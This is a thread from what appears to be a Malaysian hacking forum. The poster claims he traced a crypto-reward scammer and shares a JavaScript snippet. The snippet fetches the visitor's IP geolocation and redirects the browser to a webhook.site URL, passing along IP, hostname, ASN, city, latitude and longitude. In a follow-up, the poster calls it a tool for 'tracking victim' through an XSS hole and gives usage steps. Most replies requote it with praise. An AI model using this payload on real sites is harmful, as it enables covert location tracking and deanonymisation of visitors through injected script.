Welcome!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

SignUp Now!

Tutorial Elite hacker malaysia ,hack bad hacker

Tutorial thread

mucomplex

Corporal
EliteGhost
Joined
Jun 8, 2021
Messages
221
Reaction score
1,376
DragonCoin
1,088
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
 
Last edited:

_amzxr_

Private
DFM Member
Joined
Jun 6, 2021
Messages
83
Reaction score
76
DragonCoin
656
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
Script ni utk ape? And how to use it
 

mucomplex

Corporal
EliteGhost
Joined
Jun 8, 2021
Messages
221
Reaction score
1,376
DragonCoin
1,088
Script ni utk ape? And how to use it
Untuk tracking victim.. script ni boleh execute bila jumpa kelemahan XSS di website dia.

1 . untuk testing pembelajaran boleh dapatkan link di :


2. dan replace pada script yang tersedia..
3. open browser console, then paste script.
4.check balik webhook.site tuk dapatkan location data
 

_amzxr_

Private
DFM Member
Joined
Jun 6, 2021
Messages
83
Reaction score
76
DragonCoin
656
Untuk tracking victim.. script ni boleh execute bila jumpa kelemahan XSS di website dia.

1 . untuk testing pembelajaran boleh dapatkan link di :


2. dan replace pada script yang tersedia..
3. open browser console, then paste script.
4.check balik webhook.site tuk dapatkan location data
Wow. Tq2
 

Ragnar Pendragon

Sargent
DFM Member
Joined
Jun 4, 2021
Messages
536
Reaction score
1,546
DragonCoin
177,799
Kancil Turbo
Ancient Piranha
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
Legend
 

Ghazyuri

Sargent
DFM Member
Joined
Jun 4, 2021
Messages
493
Reaction score
945
DragonCoin
14,889
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
Idola
 

Yoshiki

Lance Corporal
DFM Member
Joined
Jun 5, 2021
Messages
138
Reaction score
234
DragonCoin
6,065
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
Hacker tu salah org ni🤣
 

Hasief

Warrant Officer I
Bawang Rangers
Joined
Jun 6, 2021
Messages
1,966
Reaction score
3,761
DragonCoin
789
Charlie Dame...
Charlie Dame...
Charlie Dame...
Charlie Dame...
Charlie Dame...
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
WOWWWW MANTAP HEHEHEHE
 

Bahahaisthebest

Corporal
DFM Member
Joined
Jun 24, 2021
Messages
220
Reaction score
518
DragonCoin
4,845
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
1635945669430.png NICE
 

LilBoyyy

Sargent
Bawang Rangers
Joined
Sep 29, 2021
Messages
585
Reaction score
2,637
DragonCoin
44,432
Eagle
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
Wahh Terbaik dan thank you sharing thr script
 

Jaring

Warrant Officer I
DFM Hackers
Joined
Jun 28, 2021
Messages
1,504
Reaction score
4,458
DragonCoin
1,907
Mac OS
iOS
Microsoft Windows
Android
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
Thank you for your info 👍👌🤠
 

Craglitch

Corporal
DFM Member
Joined
Oct 29, 2021
Messages
246
Reaction score
691
DragonCoin
17,186
Fire Red Dragon
Frost Dragon
Eagle
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
Genius iq 1000 hahahah
 

Amir_raff

Corporal
DFM Member
Joined
Jun 5, 2021
Messages
276
Reaction score
563
DragonCoin
30,168
GTA V
iOS
Laptop 1 Malaysia, Laptop legend Hacker 2010-now
Ancient Piranha
Thinkpad x1
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
Paduuu,,,tq for sharing 🤩
 

Syedhafiz1234

Lance Corporal
DFM Member
Joined
Nov 14, 2021
Messages
117
Reaction score
262
DragonCoin
195
Kisah benar,

Beberapa hari lepas, aku dapat beberapa facebook notification dan email message dari few scammer, yang memberi tahu tetang "memenangi 1700$ USD crypto reward", tapi malangnya scammer tersebut target orang yang salah. Jadi selepas aku menekan link yang dibagi, tab baru dipapar supaya memasukkan seed phase, untuk memenangi ganjaran tersebut. Teknik ini juga digunakan untuk mengaburi banyak orang. Selepas Osint link website,kerja2 scam ni dah lama dilakukan sejak awal februari haritu dan cloud hosting di rusia. Ada attack vector yang aku dapat mencari hacker tersebut untuk mendapatkan lokasi yang sebenar. Javascript yang aku craft ni, aku share kepada komunity. Selepas scammer tersebut tahu kehadiran aku, dia terus shutdown link site tersebut. Disini scammer tersebut tidak dapat jejak lokasi asal aku, sedangkan aku dah tahu location sebenar dia. maybe dah kecut perut sebab dia tak tahu siapa yang track dia.

JavaScript:
<script>
var geo_lookup =$.getJSON('https://json.geoiplookup.io/?callback=?', function(data) {
  console.log(JSON.stringify(data, null, 2));
 
});

await new Promise(r => setTimeout(r, 11000));


document.location='https://webhook.site/d9492175-b7b1-453c-af60-5a9c423016e0?ip='+geo_lookup.responseJSON.ip+'&hostname='+geo_lookup.responseJSON.hostname+'&asn_number='+geo_lookup.responseJSON.asn_number+'&asn='+geo_lookup.responseJSON.asn+'&country_name='+geo_lookup.responseJSON.country_name+'&region='+geo_lookup.responseJSON.region+'&district='+geo_lookup.responseJSON.district+'&city='+geo_lookup.responseJSON.city+'&postal_code='+geo_lookup.responseJSON.postal_code+'&latitude='+geo_lookup.responseJSON.latitude+'&longitude='+geo_lookup.responseJSON.longitude;

</script>

korang boleh gunakan service webhook tuk genrate anon-url

Scammer link:
nice sifu,,

banyak scammer guna fb sekarang
 
Top